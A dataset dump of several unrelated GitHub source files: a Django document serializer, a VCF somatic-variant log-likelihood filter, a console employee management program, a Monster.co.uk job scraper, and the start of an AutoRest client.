serializers.SerializerMethodField()\n\n class Meta:\n model = Document\n fields = ['id', 'title', 'text', 'file', 'date_created', 'date_expired', 'status', 'document_root', 'check_date']\n\n\n def get_check_date(self, obj):\n check_date = ''\n date_expired = obj.date_expired\n date_now = datetime.datetime.date(timezone.now())\n if date_now > date_expired:\n check_date = 'dead'\n obj.status = check_date\n obj.save()\n return check_date\n\n def create(self, validated_data):\n user = validated_data.pop('user')\n group = user.groups.all()[0].name\n doc_root = validated_data['document_root']\n if group == 'general' and doc_root in ['public', 'private', 'secret']:\n document = Document.objects.create(**validated_data)\n elif group == 'president':\n document = Document.objects.create(**validated_data)\n else:\n raise ValidationError(\"You have no permission!\")\n return document\n", "repo_name": "rzhvn1/Military_CRM", "sub_path": "CRM_project/documents/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1314, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.serializers.SerializerMethodField", "line_number": 11, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.now", "line_number": 21, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 21, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "22471037342", "text": "import argparse\nimport sys\nimport os\nimport re\nimport vcfpy\nimport tempfile\nimport csv\nimport math\nfrom collections import OrderedDict\n\ndef define_parser():\n parser = argparse.ArgumentParser('somatic-llr-filter')\n parser.add_argument(\n \"input_vcf\",\n help=\"A VCF file with at least two samples (tumor and normal) and readcount information\"\n )\n parser.add_argument(\n \"output_vcf\",\n help=\"Path to write the output VCF file\"\n )\n parser.add_argument(\n \"--sequence-error-rate\",\n help=\"expected sequencing error rate (range 0 to 1) - default 0.005\",\n type=float,\n default=0.005\n )\n parser.add_argument(\n \"--tumor-purity\",\n help=\"tumor purity (range 0 to 1) - default 1\",\n type=float,\n default=1\n )\n parser.add_argument(\n \"--normal-contamination-rate\",\n help=\"normal contamination rate (range 0 to 1) - default 0\",\n type=float,\n default=0\n )\n parser.add_argument(\n \"--allele-depth-field\",\n help=\"field corresponding to allele depth - default AD\",\n default=\"AD\"\n )\n parser.add_argument(\n \"--site-depth-field\",\n help=\"field corresponding to site depth - default DP\",\n default=\"DP\"\n )\n parser.add_argument(\n \"--tumor-sample-name\",\n help=\"name of the vcf sample corresponding to the tumor - default TUMOR\",\n default=\"TUMOR\"\n )\n parser.add_argument(\n \"--normal-sample-name\",\n help=\"name of the vcf sample corresponding to the normal - default NORMAL\",\n default=\"NORMAL\"\n )\n parser.add_argument(\n \"--llr-field\",\n help=\"name of the vcf info field in which to store the log-likelihood ratio value\",\n default=\"LLR\"\n )\n parser.add_argument(\n \"--somatic-field\",\n help=\"name of the vcf info field in which to store the classification call from this script (somatic = 0 or 1)\",\n default=\"SOMATIC\"\n )\n parser.add_argument(\n \"--llr-threshold\",\n type=float,\n help=\"if set, variants that are not somatic or have an LLR value below this threshold will have their FILTER field set appropriately\"\n )\n parser.add_argument(\n \"--filter-field\",\n help=\"if --llr-threshold is given, then failing variants will have this string added to their FILTER field\",\n default=\"SOMATIC_LLR\"\n )\n \n parser.add_argument('-w', \"--overwrite\", action='store_true',\n help=\"by default, this tool will raise an exception if the LLR or SOMATIC fields already exist in the VCF. This flag allows existing fields to be overwritten.\"\n )\n return parser\n\n\ndef create_vcf_reader(args):\n vcf_reader = vcfpy.Reader.from_path(args.input_vcf)\n #do some sanity checking\n sample_names = vcf_reader.header.samples.names\n is_multi_sample = len(sample_names) > 1\n if(not is_multi_sample):\n vcf_reader.close()\n raise Exception(\"A multisample VCF with both tumor and normal data is required\")\n\n if not args.tumor_sample_name in sample_names:\n raise Exception(\"Could not find tumor sample name {} in sample names\".format(args.tumor_sample_name))\n if not args.normal_sample_name in sample_names:\n raise Exception(\"Could not find normal sample name {} in sample names\".format(args.normal_sample_name))\n\n #check for needed format fields\n if not args.allele_depth_field in vcf_reader.header.format_ids():\n vcf_reader.close()\n raise Exception(\"No \" + args.allele_depth_field + \" format field found. Annotate your VCF with readcounts first\")\n if not args.site_depth_field in vcf_reader.header.format_ids():\n vcf_reader.close()\n raise Exception(\"No {} format field found. Annotate your VCF with readcounts first\".format(args.site_depth_field))\n\n return vcf_reader\n\n\ndef create_vcf_writer(args, vcf_reader):\n output_file = args.output_vcf\n\n new_header = vcf_reader.header.copy()\n\n #check/add llr field in header\n if args.llr_field in vcf_reader.header.info_ids():\n if args.overwrite: #verify compatibility\n if not vcf_reader.header.get_info_field_info(args.llr_field).type == \"Float\":\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must be of type 'Float'. Either modify this, or choose a new {} field\".format(args.llr_field,args.llr_field))\n if not vcf_reader.header.get_info_field_info(args.llr_field).number == 1:\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must have Number '1'. Either modify this, or choose a new {} field\".format(args.llr_field,args.llr_field))\n else: \n vcf_reader.close()\n raise Exception(\"INFO already contains a {} field. Choose a different label, or use the --overwrite flag to retain this field description and overwrite values\".format(args.llr_field))\n\n else:\n od = OrderedDict([('ID', args.llr_field), ('Number', '1'), ('Type', 'Float'), ('Description', 'log-likelihood ratio for the binomial filter call')])\n new_header.add_info_line(od)\n\n #check/add somatic field in header\n if args.somatic_field in vcf_reader.header.info_ids():\n if args.overwrite:\n if not vcf_reader.header.get_info_field_info(args.somatic_field).type == \"Flag\":\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must be of type 'Flag'. Either modify this, or choose a new {} field\".format(args.somatic_field,args.somatic_field))\n if not vcf_reader.header.get_info_field_info(args.somatic_field).number == 0:\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must have Number '0'. Either modify this, or choose a new {} field\".format(args.somatic_field,args.somatic_field))\n else:\n vcf_reader.close()\n raise Exception(\"INFO already contains a {} field. Choose a different label, or use the --overwrite flag to retain this field description and overwrite values\".format(args.somatic_field))\n else:\n od = OrderedDict([('ID', args.somatic_field), ('Number', '0'), ('Type', 'Flag'), ('Description', 'Is a somatic mutation')])\n new_header.add_info_line(od)\n\n #check/add FILTER field in header\n if args.llr_threshold is not None: #filtering may not even be specified\n if args.filter_field in vcf_reader.header.filter_ids():\n if not args.overwrite:\n vcf_reader.close()\n raise Exception(\"FILTER {} already exists. Choose a different --filter-field, or use the --overwrite flag to retain this filter description and overwrite values\".format(args.filter_field))\n else:\n od = OrderedDict([('ID', args.filter_field), ('Description', 'Is a somatic mutation with LLR lower than {}'.format(args.llr_threshold))])\n new_header.add_filter_line(od)\n\n\n return vcfpy.Writer.from_path(output_file, new_header)\n\n\n#for each call possibility (ref, germ het, germ hom, etc)\n#calculate the llr here\ndef calc_llr(normal_expect, tumor_expect, normal_ref, normal_var, tumor_ref, tumor_var):\n return(normal_ref * math.log(1-normal_expect) +\n normal_var * math.log(normal_expect) +\n tumor_ref * math.log(1-tumor_expect) +\n tumor_var * math.log(tumor_expect))\n\ndef get_llr(call, normal_ref, normal_var, tumor_ref, tumor_var, error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, tumor_purity, normal_contamination_rate, error_expect):\n if call == \"Germline_het\":\n return(calc_llr(heterozygous_expect, heterozygous_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"Germline_hom\":\n return(calc_llr(homozygous_expect, homozygous_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"LOH_ref\":\n return(calc_llr(heterozygous_expect, error_rate,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"LOH_variant\":\n return(calc_llr(heterozygous_expect, homozygous_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"NotSomatic\":\n return(calc_llr(error_expect, error_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"Reference\":\n return(calc_llr(error_rate, error_rate,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"Somatic\":\n return(calc_llr(error_rate + (tumor_freq / tumor_purity * normal_contamination_rate), tumor_freq,\n normal_ref, normal_var, tumor_ref, tumor_var))\n raise Exception('Call \"' + call + '\" is not a recognized type')\n\n\ndef make_call(normal_ref, normal_var, tumor_ref, tumor_var, error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, tumor_purity, normal_contamination_rate, error_expect):\n #Want to test several models and pick the most likely one\n #Reference: normal expectation is 0.001 and tumor expectation is 0.01\n #Germline Het: normal expectation is 0.5 and tumor expectation is 0.5\n #Somatic Het: normal expectation is 0.001 and tumor expectation in 0.5\n #Germline Homozygote: normal expectation is 0.999 and tumor expectation is 0.999\n #LOH (variant): germline is 0.5 and tumor is 0.999\n #LOH (ref): germline is 0.5 and tumor is 0.001\n\n marginal_probability = None\n max_llr = None\n max2_llr = None\n max_call = None\n max2_call = None\n llr = 0\n\n if(tumor_var == 0): #special case that chokes some of the log code. LLR is always zero if we have no supp reads\n return([0,\"Reference\"])\n\n call_types = [\"Germline_het\", \"Germline_hom\", \"LOH_ref\", \"LOH_variant\", \"NotSomatic\", \"Reference\", \"Somatic\"];\n for call in call_types:\n llr = get_llr(call, normal_ref, normal_var, tumor_ref, tumor_var, error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, tumor_purity, normal_contamination_rate, error_expect)\n if marginal_probability is None:\n marginal_probability=llr\n elif llr > marginal_probability:\n marginal_probability = llr + math.log(1 + math.exp(marginal_probability-llr))\n else:\n marginal_probability = marginal_probability + math.log(1 + math.exp(llr-marginal_probability))\n\n max_llr_def = (max_llr is not None)\n max2_llr_def = (max2_llr is not None)\n\n if not (max_llr_def and (llr < max_llr)):\n #save the second-place, store the new best\n max2_call = max_call\n max2_llr = max_llr\n max_llr = llr\n max_call = call\n elif not (max2_llr_def and (llr < max2_llr)):\n max2_call = call\n max2_llr = llr\n #end for\n\n #get the final llr\n if max_llr is not None:\n llr = max_llr-max2_llr\n else:\n llr = 0\n\n #get the final call\n if max_call is None:\n max_call = \"-\"\n\n return (llr,max_call)\n\n\n\ndef main(args_input = sys.argv[1:]):\n parser = define_parser()\n args = parser.parse_args(args_input)\n\n #these aren't going to change per site\n homozygous_expect = 1 - args.sequence_error_rate;\n heterozygous_expect = 0.5;\n\n vcf_reader = create_vcf_reader(args)\n vcf_writer = create_vcf_writer(args, vcf_reader)\n\n for entry in vcf_reader:\n #collect the needed info\n ref = entry.REF\n alts = entry.ALT\n\n #this code will mostly handle multiple alleles, as written, but the issue is that there is\n #no way to set the INFO (SOMATIC) field appropriately when there are multiple alleles per line,\n # so we're going to restrict it to decomposed VCFs - one variant per line\n if len(alts) > 1:\n raise Exception(\"site with multiple alleles detected. This tool requires a decomposed vcf (one allele per line) so that INFO fields can be set appropriately\")\n\n def getFormatField(sample_name, field_name):\n if(sample_name in entry.call_for_sample and field_name in entry.call_for_sample[sample_name].data):\n return entry.call_for_sample[sample_name].data[field_name]\n return(\"NA\")\n\n def missingVals(arr):\n for i in arr:\n if i == \"NA\":\n return True\n return False\n\n ad_nrm = getFormatField(args.normal_sample_name,args.allele_depth_field)\n ad_tum = getFormatField(args.tumor_sample_name,args.allele_depth_field)\n normal_depth = getFormatField(args.normal_sample_name,args.site_depth_field)\n tumor_depth = getFormatField(args.tumor_sample_name,args.site_depth_field)\n normal_ref = ad_nrm[0]\n tumor_ref = ad_tum[0]\n\n call = \"\"\n llr = 0\n\n #TODO parse out per alt, retrieve calls\n for i in range(1,(len(alts)+1)): #right now, this will only ever be one, due to above check. Could be expanded to support multiple alleles - see above\n if(ad_nrm == \"NA\"):\n normal_var = \"NA\"\n else:\n normal_var = ad_nrm[i]\n if(ad_tum == \"NA\"):\n tumor_var = \"NA\"\n else:\n tumor_var = ad_tum[i]\n \n #if neither has any depth or vals or missing, then fail this up front\n if missingVals([normal_var,tumor_var,tumor_depth,normal_depth]) or (tumor_depth + normal_depth == 0):\n (llr,call) = (0,\"Reference\")\n continue\n \n #weighted average of the frequencies\n error_expect = (tumor_var + normal_var)/(tumor_depth + normal_depth)\n #dave had this line in there, but I don't know why...\n #error_expect ||= error_rate\n if error_expect == 1:\n error_expect = 1 - args.sequence_error_rate\n\n #handle case where depth is zero or missing\n if tumor_depth == 0:\n tumor_freq = 0\n else:\n tumor_freq = tumor_var/tumor_depth\n\n if tumor_freq == 0:\n tumor_freq = args.sequence_error_rate\n elif tumor_freq == 1:\n tumor_freq = tumor_freq - args.sequence_error_rate\n\n (llr,call) = make_call(normal_ref, normal_var, tumor_ref, tumor_var, args.sequence_error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, args.tumor_purity, args.normal_contamination_rate, error_expect)\n\n #Store it back in the entry before writing out.\n if call == \"Somatic\":\n entry.INFO[args.somatic_field] = 1\n else:\n entry.INFO.pop('SOMATIC',None)\n\n entry.INFO[args.llr_field] = llr\n\n #do filtering if specified\n if args.llr_threshold is not None:\n if (not call == \"Somatic\") or (llr < args.llr_threshold):\n entry.add_filter(args.filter_field);\n\n vcf_writer.write_record(entry)\n\n vcf_reader.close()\n vcf_writer.close()\n\nif __name__ == '__main__':\n main()\n", "repo_name": "genome/docker-somatic-llr-filter", "sub_path": "somatic_llr_filter.py", "file_name": "somatic_llr_filter.py", "file_ext": "py", "file_size_in_byte": 15116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "vcfpy.Reader.from_path", "line_number": 87, "usage_type": "call"}, {"api_name": "vcfpy.Reader", "line_number": 87, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 130, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 146, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 156, "usage_type": "call"}, {"api_name": "vcfpy.Writer.from_path", "line_number": 160, "usage_type": "call"}, {"api_name": "vcfpy.Writer", "line_number": 160, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 166, "usage_type": "call"}, {"api_name": "math.log", "line_number": 167, "usage_type": "call"}, {"api_name": "math.log", "line_number": 168, "usage_type": "call"}, {"api_name": "math.log", "line_number": 169, "usage_type": "call"}, {"api_name": "math.log", "line_number": 224, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 224, "usage_type": "call"}, {"api_name": "math.log", "line_number": 226, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 226, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 256, "usage_type": "attribute"}]} +{"seq_id": "6320645785", "text": "import datetime\n# This is an employee class and it is a parent class\n# This function will get only integer value\nemployee_designations = (\"Manager\", \"Supervisor\", \"Supervisor Backup\", \"Sales Man\", \"Office Boy\")\n\n\ndef input_number(message):\n while True:\n try:\n user_input = int(input(message))\n\n except ValueError:\n print(\"Not an integer value! Try again\")\n continue\n else:\n return user_input\n break\n\n\ndef designation():\n while True:\n\n choice = input_number(\"Chose Designation\\n1-Manager\\n2-Supervisor\\n3-Supervisor Backup\\n4-Sales Man\\n5-Office Boy\")\n if choice > 0 and choice < 6:\n return employee_designations[choice-1]\n break\n else:\n print(\"value must be integer from 1 - 5\")\n\n\n\nclass Employee:\n e_id = 0\n\n def __init__(self, nam, des, sal, exp, rep=None):\n\n self.Name = nam\n self.Roll = des\n self.Salary = sal\n self.Report = rep\n self.Experience = exp\n self.Manger_Remarks = \"none\"\n self.employee_id = 0\n# new comment by me\n\n def showemployees(self, lst):\n print(\"--------------------------------------------\")\n print(\" All Employees Data\")\n print(\"--------------------------------------------\")\n for i in lst:\n print(\"Employee ID = \", i.employee_id)\n print(\"Employee Name = \", i.Name)\n print(\"Employee Designation = \", i.Roll)\n print(\"Employee Report = \", i.Report)\n print(\"Employee Experience = \", i.Experience)\n print(\"Manger Remarks = \", i.Manger_Remarks)\n print(\"--------------------------------------------\")\n\n def set_id(self, id):\n self.employee_id = id\n\n\nclass EmployeeManager(Employee):\n def __init__(self):\n pass\n\n def show_report(self, lst):\n\n search_employee = input(\"Enter employee id for search report\")\n s_m = int(search_employee)\n\n for i in lst:\n if i.Employee_Id == s_m:\n print(\"--------------------------------------------\")\n print(\" Employee Report\")\n print(\"--------------------------------------------\")\n print(\"Employee ID = \", i.Employee_Id)\n print(\"Employee Name = \", i.Name)\n print(\"Employee Designation = \", i.Roll)\n print(\"Employee Report = \", i.Report)\n print(\"Last Remarks = \", i.Manger_Remarks)\n remarks = input(\"Enter Remarks\")\n i.Manger_Remarks = remarks\n print(\"--------------------------------------------\")\n break\n\n else:\n print(\"employee does not exist\")\n\n\n# create function for manage employee\n# if progress is less then 5 then do not assign other task\n\n\nclass EmployeeGeneral(Employee):\n def __init__(self):\n pass\n\n def create_report(self, lst):\n search_employee = input(\"Enter employee id for Enter report\")\n s_m = int(search_employee)\n\n for i in lst:\n if i.Employee_Id == s_m:\n print(\"--------------------------------------------\")\n print(\" Employee Report\")\n print(\"--------------------------------------------\")\n print(\"Employee ID = \", i.Employee_Id)\n print(\"Employee Name = \", i.Name)\n print(\"Employee Designation = \", i.Roll)\n i.Report = int(input(\"Enter Report (1 - 10) = \"))\n\n\n print(\"--------------------------------------------\")\n break\n\n else:\n print(\"employee does not exist\")\n\n def manager_remarks(self, lst):\n\n search_employee = input(\"Enter employee id for search report\")\n s_m = int(search_employee)\n\n for j in lst:\n if j.Employee_Id == s_m:\n print(\"--------------------------------------------\")\n print(\" Manger Remarks on Report\")\n print(\"--------------------------------------------\")\n print(\"Employee ID = \", j.Employee_Id)\n print(\"Employee Name = \", j.Name)\n print(\"Employee Designation = \", j.Roll)\n print(\"Employee Report = \", j.Report)\n print(\"Manager Remarks = \", j.Manger_Remarks)\n\n print(\"--------------------------------------------\")\n break\n\n else:\n print(\"employee does not exist\")\n\n\n\n\nEmployee_List = []\n\n\ndef add_employee():\n print(\"--------------------------------------------\")\n print(\" Create new employee\")\n print(\"--------------------------------------------\")\n name = input(\"Enter Name :\")\n\n roll = designation()\n dat = datetime.datetime.now()\n print(dat.year, \"/\", dat.day, \"/\", dat.strftime(\"%A\"))\n\n print(dat)\n print(dat.month)\n\n experience = 0\n salary = input_number(\"Enter your salary\")\n print(\"--------------------------------------------\")\n return name, roll, experience, salary\n\n\ndef add_new_employee():\n name, roll, experience, salary = add_employee()\n employee = Employee(name, roll, experience, salary)\n employee.set_id(Employee.e_id + 1)\n Employee.e_id = Employee.e_id + 1\n Employee_List.append(employee)\n\n\n#Employee_obj = Employee(1, \"Arslan\", \"PM\", 500, 1, \"none\")\n#Employee_List.append(Employee_obj)\ni = 1\nwhile i > 0:\n print(\"Enter Your Desiger Value for Search\\n 1 - Add New Employee\\n 2 - Search All Employees\")\n print(\" 3 - Search Report ( Only for manager )\\n 4 - Enter Report\\n 5 - Search Manager Remarks on Report\")\n search_value = int(input(\"Enter here : \"))\n if search_value == 1:\n add_new_employee()\n elif search_value == 2:\n Obj = EmployeeManager()\n Obj.showemployees(Employee_List)\n print(\"thank you\")\n elif search_value == 3:\n Obj = EmployeeManager()\n Obj.show_report(Employee_List)\n elif search_value == 4:\n print(\"working on it...\")\n obj = EmployeeGeneral()\n obj.create_report(Employee_List)\n elif search_value == 5:\n obj = EmployeeGeneral()\n obj.manager_remarks(Employee_List)\n\n else:\n print(\"you chosen wrong value\")\n choice = int(input(\"Enter 1 - If you want to goto main menu\"))\n if choice != 1:\n print(\"End programe\")\n break", "repo_name": "arslan-asghar/Employee-Management-System", "sub_path": "EMS.py", "file_name": "EMS.py", "file_ext": "py", "file_size_in_byte": 6430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "attribute"}]} +{"seq_id": "13326043488", "text": "import os\nimport pandas as pd\nfrom scrapfly import ScrapflyClient, ScrapeConfig\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm \nimport re\nimport requests\nimport json\nfrom datetime import date\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nSCRAPFLY_API_KEY = os.getenv(\"SCRAPFLY_API_KEY\")\n\ndef scrapfly_request(link):\n \n scrapfly = ScrapflyClient(key=SCRAPFLY_API_KEY)\n result = scrapfly.scrape(ScrapeConfig(\n url = link,\n country = \"gb\",\n ))\n \n return result.content\n\ndef get_apikey_fingerprint(link):\n content = scrapfly_request(link)\n soup = BeautifulSoup(content,features=\"lxml\")\n \n data = str(soup)\n pattern = r'\"key\":\"([^\"]+)\"'\n\n match = re.search(pattern, data)\n\n if match:\n key_value_pair = match.group(1)\n \n pattern = r'fingerprint\":\"([^\"]+)\"'\n\n match = re.search(pattern, data)\n\n if match:\n fingerprint_value = match.group(1)\n \n return fingerprint_value,key_value_pair\n\ndef get_searchId(fingerprint_value,key_value_pair,offset,query):\n url = f\"https://appsapi.monster.io/jobs-svx-service/v2/monster/search-jobs/samsearch/en-GB?apikey={key_value_pair}\"\n \n payload = '''{\"jobQuery\":{\n\"query\":\"'''+str(query)+'''\",\"locations\":[{\"country\":\"gb\",\"address\":\"\",\"radius\":{\"unit\":\"mi\",\"value\":20}}],\"activationRecency\":\"today\"},\"jobAdsRequest\":{\"position\":[1,2,3,4,5,6,7,8,9],\"placement\":{\"channel\":\"WEB\",\"location\":\"JobSearchPage\",\"property\":\"monster.co.uk\",\"type\":\"JOB_SEARCH\",\"view\":\"SPLIT\"}},\n \"fingerprintId\":\"'''+str(fingerprint_value)+'''\",\"offset\":\"'''+str(offset)+'''\",\"pageSize\":9,\"histogramQueries\":[\"count(company_display_name)\",\"count(employment_type)\"],\"includeJobs\":[]}'''\n\n \n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n 'content-type': 'application/json; charset=UTF-8'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n return json.loads(response.text)\n\ndef scrap_job_data(fingerprint_value,key_value_pair,offset,searchId,location):\n url = f\"https://appsapi.monster.io/jobs-svx-service/v2/monster/search-jobs/samsearch/en-GB?apikey={key_value_pair}\"\n\n payload = '{\\\"jobQuery\\\":{\\\"query\\\":\\\"\\\",\\\"locations\\\":[{\\\"country\\\":\\\"gb\\\",\\\"address\\\":\\\"Bedfordshire\\\",\\\"radius\\\":{\\\"unit\\\":\\\"mi\\\",\\\"value\\\":5}}],\\\"activationRecency\\\":\\\"today\\\"},\\\"jobAdsRequest\\\":{\\\"position\\\":[1,2,3,4,5,6,7,8,9],\\\"placement\\\":{\\\"channel\\\":\\\"WEB\\\",\\\"location\\\":\\\"JobSearchPage\\\",\\\"property\\\":\\\"monster.co.uk\\\",\\\"type\\\":\\\"JOB_SEARCH\\\",\\\"view\\\":\\\"SPLIT\\\"}},\\\"fingerprintId\\\":\\\"z50446280c2b01c552e1556a3d58d1e28\\\",\\\"offset\\\":9,\\\"pageSize\\\":9,\\\"histogramQueries\\\":[\\\"count(company_display_name)\\\",\\\"count(employment_type)\\\"],\\\"searchId\\\":}'\n\n payload = re.sub(r'\"fingerprintId\":\"[^\"]+\"', f'\"fingerprintId\":\"{fingerprint_value}\"', payload)\n payload = re.sub(r'\"offset\":\\d+', f'\"offset\":{offset}', payload)\n payload = re.sub(r'\"searchId\":', f'\"searchId\":\"{searchId}\"', payload)\n payload = re.sub(r'\"address\":\"([^\"]+)\"', f'\"address\":\"{location}\"', payload)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n 'content-type': 'application/json; charset=UTF-8'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n return json.loads(response.text)\n\ndef monster_scrap(monster_link):\n if not os.path.exists(\"output/monster/data_by_location\"):\n os.makedirs(\"output/monster/data_by_location\")\n if not os.path.exists(\"output/monster/full_data\"):\n os.makedirs(\"output/monster/full_data\")\n pages_data = []\n job_data = []\n offset = 0 \n fingerprint_value,key_value_pair = get_apikey_fingerprint(monster_link['links']) \n for i in tqdm(range(0,1000)):\n # try:\n data = get_searchId(fingerprint_value,key_value_pair,offset,monster_link['locations'])\n if 'message' in data.keys():\n break\n if data['totalSize']==0:\n break\n offset+=9\n pages_data.append(data)\n # except:\n # pass\n for jobs in pages_data:\n for job in jobs['jobResults']:\n try:\n title = job['jobPosting']['title']\n posted = job['jobPosting']['datePosted']\n location = job['jobPosting']['jobLocation'][0]['address']['addressLocality']+','+job['jobPosting']['jobLocation'][0]['address']['addressRegion']\n company = job['jobPosting']['hiringOrganization']['name']\n url = job['jobPosting']['url']\n job_data.append({'posted':posted,'job title':title,'company working':company,'location working':location,'link':url}) \n except:\n pass\n df = pd.DataFrame(job_data)\n df = df.drop_duplicates()\n\n df.to_csv(f'output/monster/data_by_location/monster_output_{monster_link[\"locations\"]}_{date.today()}.csv',index=False)\n\ndef merge_data():\n folder_path = 'output/monster/data_by_location'\n\n csv_files = [file for file in os.listdir(folder_path) if file.endswith(f'_{date.today()}.csv')]\n\n new_folder_path = 'output\\\\monster\\\\full_data'\n\n if len(csv_files) == 0:\n print(\"No CSV files found in the folder.\")\n dataframes = []\n\n for file in csv_files:\n try:\n file_path = os.path.join(folder_path, file)\n df = pd.read_csv(file_path)\n dataframes.append(df)\n\n merged_data = pd.concat(dataframes, ignore_index=True)\n merged_file_path = os.path.join(new_folder_path, f'monster_full_data_{date.today()}.csv')\n merged_data.to_csv(merged_file_path, index=False)\n except:\n pass\n\n", "repo_name": "zakaria47fs/jobs-scrapers", "sub_path": "utils/utils_monster.py", "file_name": "utils_monster.py", "file_ext": "py", "file_size_in_byte": 5812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "scrapfly.ScrapflyClient", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapfly.scrape", "line_number": 19, "usage_type": "call"}, {"api_name": "scrapfly.ScrapeConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 28, "usage_type": "call"}, {"api_name": "re.search", "line_number": 33, "usage_type": "call"}, {"api_name": "re.search", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 60, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 69, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 70, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 71, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 72, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 78, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 86, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 116, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 121, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 136, "usage_type": "name"}]} +{"seq_id": "73182539364", "text": "from typing import TYPE_CHECKING\n\nfrom azure.core import PipelineClient\nfrom msrest import Deserializer, Serializer\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from typing import Any, Optional\n\nfrom ._configuration import AutoRestRequiredOptionalTestServiceConfiguration\nfrom .operations import ImplicitOperations\nfrom .operations import ExplicitOperations\nfrom . import models\n\n\nclass AutoRestRequiredOptionalTestService(object):\n \"\"\"Test Infrastructure for AutoRest.\n\n :ivar implicit: ImplicitOperations operations\n :vartype implicit: requiredoptional.operations.ImplicitOperations\n :ivar explicit: ExplicitOperations operations\n :vartype explicit: requiredoptional.operations.ExplicitOperations\n :param required_global_path: number of items to skip.\n :type required_global_path: str\n :param required_global_query: number of items to skip.\n :type required_global_query: str\n :param optional_global_query: number of items to skip.\n :type optional_global_query: int\n :param str base_url: Service URL\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n \"\"\"\n\n def __init__(\n self,\n 